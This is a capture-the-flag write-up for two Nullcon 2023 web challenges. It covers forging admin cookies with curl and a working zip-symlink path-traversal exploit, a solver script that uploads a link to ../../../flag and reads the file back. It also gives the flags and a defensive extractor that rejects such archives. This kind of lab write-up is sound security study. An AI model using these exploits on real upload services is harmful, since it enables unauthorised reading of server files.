Nullcon CTF 2023
https://ctftime.org/event/1900
Challs
| Category | Challenge |
|---|---|
| Web | reguest |
| Web | zpr |
reguest
Description
Desc: HTTP requests and libraries are hard. Sometimes they do not behave as expected, which might lead to vulnerabilities.
http://52.59.124.14:10014
We can send an HTTP GET request to the address http://52.59.124.14:10014 that includes a cookie in the request header, for example with Python's requests library:

```python
import requests

url = 'http://52.59.124.14:10014'
# Cookies sent with the request: the server checks both keys
cookies = {'role': 'admin', 'really': 'yes'}
resp = requests.get(url, cookies=cookies)
print(resp.content.decode())
```
In the curl form, the -b argument specifies the cookie that will be included in the request header; its value is `role=admin; really=yes`. The server can use this cookie for authentication or other settings.
In this case, the request is targeted at a web service that requires authorization at the 'admin' level and asks the user for confirmation ('really=yes').
Or use this simple payload:

```shell
$ curl -b "role=admin; really=yes" http://52.59.124.14:10014
```
```
Usage: Look at the code ;-)
Overwriting cookies with default value! This must be secure!
Prepared request cookies are: [('really', 'yes'), ('role', 'guest')]
Sending request...
Request cookies are: [('really', 'yes'), ('role', 'guest')]
Someone's drunk oO
Response is: Admin: ENO{R3Qu3sts_4r3_s0m3T1m3s_we1rd_dont_get_confused}
```
Flag
ENO{R3Qu3sts_4r3_s0m3T1m3s_we1rd_dont_get_confused}
zpr
Description
My colleague built a service which shows the contents of a zip file. He says there's nothing to worry about…
http://52.59.124.14:10015 + http://52.59.124.14:10016
Create a file named coba.txt that is a symbolic link pointing at the path ../../../flag. A soft link refers to the original file, so whatever the original file contains is also visible through the symlink.

```shell
$ ln -sfn ../../../flag coba.txt
```

Locally the coba.txt file appears blank: it is now a symlink rather than a regular file.

Then zip it into a file named test.zip that contains the file coba.txt. The --symlink argument tells zip to store the soft link coba.txt itself in the archive rather than the file it points to. Send the test.zip file to the server using the POST method.

```shell
$ zip test.zip coba.txt --symlink
```

Make an HTTP GET request to the server https://52.59.124.14:10016 to access the file coba.txt in the upload directory. The -v argument in the curl command makes the output verbose about the HTTP request process. Therefore, in addition to the contents of the coba.txt file, the output of the curl command will display information such as the status code, the headers, and the server response time.
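From the defender's side, the service was vulnerable because it extracted and served a zip entry that was a symlink. The following is an added example, not the challenge's or the author's code, of an extractor that refuses such archives (symlink entries and classic path-traversal names) before anything touches the filesystem; it assumes each upload is unpacked into its own directory and builds a constructed symlink zip, like the `zip --symlink` payload above, to exercise the checks offline.

```python
import os
import stat
import tempfile
import zipfile

def unsafe_entries(zip_path):
    """Return (name, reason) pairs for entries that must not be extracted."""
    bad = []
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            name = info.filename
            mode = info.external_attr >> 16  # Unix mode bits sit in the high half
            if stat.S_ISLNK(mode):
                # `zip --symlink` stores the link itself; once extracted, serving
                # the file follows the link out of the upload directory.
                bad.append((name, "symlink entry"))
            elif name.startswith("/") or ".." in name.replace("\\", "/").split("/"):
                bad.append((name, "path traversal"))
    return bad

def safe_extract(zip_path, dest):
    """Extract only when every entry passes the checks; return extracted names."""
    bad = unsafe_entries(zip_path)
    if bad:
        raise ValueError(f"refusing {zip_path}: {bad}")
    dest = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            # Belt and braces: the resolved target must still lie inside dest.
            target = os.path.realpath(os.path.join(dest, info.filename))
            if os.path.commonpath([dest, target]) != dest:
                raise ValueError(f"entry escapes destination: {info.filename}")
        zf.extractall(dest)
        return zf.namelist()

def demo():
    """Build a symlink zip like the challenge payload (constructed test input)
    and a benign zip; return (rejected entries, names extracted from benign)."""
    work = tempfile.mkdtemp()
    evil, good = os.path.join(work, "test.zip"), os.path.join(work, "ok.zip")
    link = zipfile.ZipInfo("coba.txt")
    link.external_attr = (stat.S_IFLNK | 0o777) << 16  # flag entry as a symlink
    with zipfile.ZipFile(evil, "w") as zf:
        zf.writestr(link, "../../../flag")  # the link target is the entry data
    with zipfile.ZipFile(good, "w") as zf:
        zf.writestr("notes.txt", "hello")  # constructed harmless upload
    rejected = unsafe_entries(evil)
    return rejected, safe_extract(good, os.path.join(work, "out"))
```

Running `demo()` returns `([('coba.txt', 'symlink entry')], ['notes.txt'])`: the challenge-style archive is rejected before extraction while a normal upload goes through.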
Final script solver

```python
import os
import requests

# Build the payload: a symlink pointing outside the upload directory,
# stored in the zip as a link (--symlink) instead of being dereferenced
os.system('ln -sfn ../../../flag coba.txt')
os.system('zip test.zip coba.txt --symlink')

# Upload the archive to the zip-viewing service
with open('test.zip', 'rb') as fh:
    files = {'file': ('test.zip', fh, 'application/zip')}
    response = requests.post('http://52.59.124.14:10015/', files=files)

print(response.text)

# The response ends with "Find your files at http://...:8088/<dir>/", so the
# second-to-last "/"-separated piece of the whole text is the upload directory
if "coba.txt" in response.text:
    filepath = response.text.strip()
    filepath_parts = filepath.split("/")
    directory = filepath_parts[-2]
    url = f"http://52.59.124.14:10016/{directory}/coba.txt"
    # Fetch coba.txt from the second service; it follows the symlink to /flag
    os.system(f"curl -v {url}")
```
Running

```
$ python3 solver.py
updating: coba.txt (stored 0%)
Found a file: /tmp/data/eef19175f624ce410f0eb8aff0e87525/bd361131b238f364b10edcc61a356ff9.zip
Found a file: /tmp/data/eef19175f624ce410f0eb8aff0e87525/coba.txt
Find your files at http://...:8088/eef19175f624ce410f0eb8aff0e87525/
*   Trying 52.59.124.14:10016...
* Connected to 52.59.124.14 (52.59.124.14) port 10016 (#0)
> GET /eef19175f624ce410f0eb8aff0e87525/coba.txt HTTP/1.1
> Host: 52.59.124.14:10016
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: SimpleHTTP/0.6 Python/3.11.2
< Date: Fri, 10 Mar 2023 12:57:01 GMT
< Content-type: text/plain
< Content-Length: 46
< Last-Modified: Thu, 09 Mar 2023 09:00:53 GMT
<
ENO{Z1pF1L3s_C4N_B3_Dangerous_so_b3_c4r3ful!}
* Closing connection 0
```
Flag
ENO{Z1pF1L3s_C4N_B3_Dangerous_so_b3_c4r3ful!}